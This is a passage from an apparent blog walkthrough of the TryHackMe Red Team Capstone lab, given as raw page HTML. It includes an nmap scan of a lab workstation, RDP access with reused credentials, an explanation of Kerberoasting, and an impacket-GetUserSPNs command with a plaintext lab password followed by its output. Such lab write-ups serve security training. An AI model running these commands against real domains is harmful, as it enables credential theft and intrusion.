stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone\/WRK1<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p22,135,139,445,3389<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WRK1.corp.thereserve.loc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-A<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-oN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap\/wrk1-fullscan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-Pn<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.94<\/span><span style=\"color: #C3E88D\">SVN<\/span><span style=\"color: #BABED8\"> ( <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org<\/span><span style=\"color: #BABED8\"> ) at 2024-02-06 12:12 CST<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">report<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WRK1.corp.thereserve.loc<\/span><span style=\"color: #BABED8\"> (10.200.113.21)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #BABED8\"> (0.52s <\/span><span style=\"color: #C3E88D\">latency<\/span><span style=\"color: #BABED8\">).<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">PORT<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">STATE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SERVICE<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">22\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\">           <\/span><span style=\"color: #C3E88D\">OpenSSH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for_Windows_7.7<\/span><span style=\"color: #BABED8\"> (protocol <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssh-hostkey:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">2048<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">21<\/span><span style=\"color: #C3E88D\">:78:e2:79:d3:93:ee:f9:aa:70:94:ec:01:b3:a5:8f<\/span><span style=\"color: #BABED8\"> (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">e0:f7:b6:67:c9:93:b5:74:0f:0a:83:ff:ef:55:c8:9a<\/span><span style=\"color: #BABED8\"> (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">bd:83:0c:e3:b4:4f:78:f2:e3:4a:52:03:3c:a5:ce:58<\/span><span style=\"color: #BABED8\"> (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">135\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">139\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">netbios-ssn<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">netbios-ssn<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">445\/tcp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">microsoft-ds?<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">3389\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ms-wbt-server<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Terminal<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Services<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_ssl-date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-06T18:13:47+00:00<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">-1s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">from<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scanner<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">time.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssl-cert:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Subject:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">commonName=WRK1.corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">before:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-04T20:26:11<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">after:<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-08-05T20:26:11<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">rdp-ntlm-info:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Target_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CORP<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">NetBIOS_Domain_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CORP<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">NetBIOS_Computer_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WRK1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Domain_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Computer_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WRK1.corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">DNS_Tree_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Product_Version:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.0<\/span><span style=\"color: #C3E88D\">.17763<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">System_Time:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-06T18:13:09+00:00<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Info:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OS:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">CPE:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cpe:\/o:microsoft:windows<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">script<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">results:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smb2-security-mode:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">3:1:1:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">Message<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">signing<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">enabled<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">but<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">required<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smb2-time:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-06T18:13:08<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">start_date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">N\/A<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_clock-skew:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mean:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-1s,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">deviation:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #C3E88D\">s,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">median:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-1s<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Since RDP is open, we can try connecting with the credentials we have. We can see that we are successfully able to RDP into the <code>WRK1<\/code> machine. The same credentials work on the <code>WRK2<\/code> machine as well.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091119ce&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091119ce\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"490\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206121625\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?fit=1702%2C957&amp;ssl=1\" data-orig-size=\"1702,957\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206121625\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?fit=1024%2C576&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-490\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?resize=1024%2C576&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?resize=300%2C169&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?resize=768%2C432&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?resize=1536%2C864&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?w=1702&amp;ssl=1 1702w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>At this point, we can submit the proof of compromises and receive the first four flags. Please refer to the section <code>Submitting the Flags<\/code> above to see the instructions on connecting to <code>e-citizen<\/code> platform and submitting the <code>proof of compromise<\/code>.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09112142&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09112142\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"587\" data-attachment-id=\"494\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206154955\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?fit=1339%2C768&amp;ssl=1\" data-orig-size=\"1339,768\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206154955\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?fit=1024%2C587&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?resize=1024%2C587&#038;ssl=1\" alt=\"\" class=\"wp-image-494\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?resize=1024%2C587&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?resize=300%2C172&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?resize=768%2C440&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?w=1339&amp;ssl=1 1339w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The credentials we have does not work on the <code>Server1<\/code> and <code>Server2<\/code> machines. We will next try using <code>Kerberoasting<\/code> attack on the Server machines.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"29-kerberoasting-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Kerberoasting<\/mark><\/h3>\n\n\n\n<p>Kerberoasting is a technique used in cybersecurity attacks to exploit weaknesses in the Kerberos authentication protocol, which is commonly used in Windows Active Directory environments for user authentication. In Kerberoasting attacks, an attacker targets service accounts that use Kerberos to authenticate, such as database or application service accounts.<\/p>\n\n\n\n<p>The attack works by requesting a ticket-granting service (TGS) ticket for a target service account from the Key Distribution Center (KDC) in the Active Directory domain. These service accounts often have a Service Principal Name (SPN) associated with them, which is used for Kerberos authentication. Once the TGS ticket is obtained, the attacker can attempt to crack the ticket&#8217;s encryption to extract the account&#8217;s password hash.<\/p>\n\n\n\n<p>Once the password hash is obtained, the attacker can then attempt to crack it using offline password-cracking techniques, such as dictionary attacks or brute force attacks. If successful, the attacker gains access to the service account&#8217;s credentials, which can be used to further escalate privileges within the network.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/GetUserSPNs.py\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">GetUserSPNs.py<\/a> can be used to obtain a password hash for user accounts that have an SPN (service principal name). If an SPN is set on a user account it is possible to request a Service Ticket for this account and attempt to crack it in order to retrieve the user password. This attack is named <a href=\"https:\/\/www.thehacker.recipes\/ad\/movement\/kerberos\/kerberoast\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Kerberoast<\/a>. This script can also be used for <a href=\"https:\/\/www.thehacker.recipes\/ad\/movement\/kerberos\/kerberoast#kerberoast-w-o-pre-authentication\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Kerberoast without authentication<\/a>.<\/p>\n\n\n\n<p>We will use a tool called <code>Impacket-GetUserSPNs<\/code> to grab Kerberos hashes for the users. We get the hashes for the following users.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone]\n\u2514\u2500$ proxychains4 impacket-GetUserSPNs corp.thereserve.loc\/laura.wood:'Password1@' -dc-ip 10.200.113.102 -request\n[proxychains] config file found: \/etc\/proxychains.conf\n[proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n[proxychains] DLL init: proxychains-ng 4.16\n[proxychains] DLL init: proxychains-ng 4.16\n[proxychains] DLL init: proxychains-ng 4.16\nImpacket v0.11.0 - Copyright 2023 Fortra\n\n[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.113.102:389  ...  OK\nServicePrincipalName  Name         MemberOf                                                   PasswordLastSet             LastLogon                   Delegation \n--------------------  -----------  ---------------------------------------------------------  --------------------------  --------------------------  ----------\ncifs\/scvScanning      svcScanning  CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:07:06.603818  &lt;never&gt;                                \ncifs\/svcBackups       svcBackups   CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:05:59.787089  2023-02-15 03:42:19.327102             \nhttp\/svcEDR           svcEDR       CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:06:21.150738  &lt;never&gt;                                \nhttp\/svcMonitor       svcMonitor   CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:06:43.306959  &lt;never&gt;                                \nmssql\/svcOctober      svcOctober   CN=Internet Access,OU=Groups,DC=corp,DC=thereserve,DC=loc  2023-02-15 03:07:45.563346  2023-03-30 17:26:54.115866 \" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 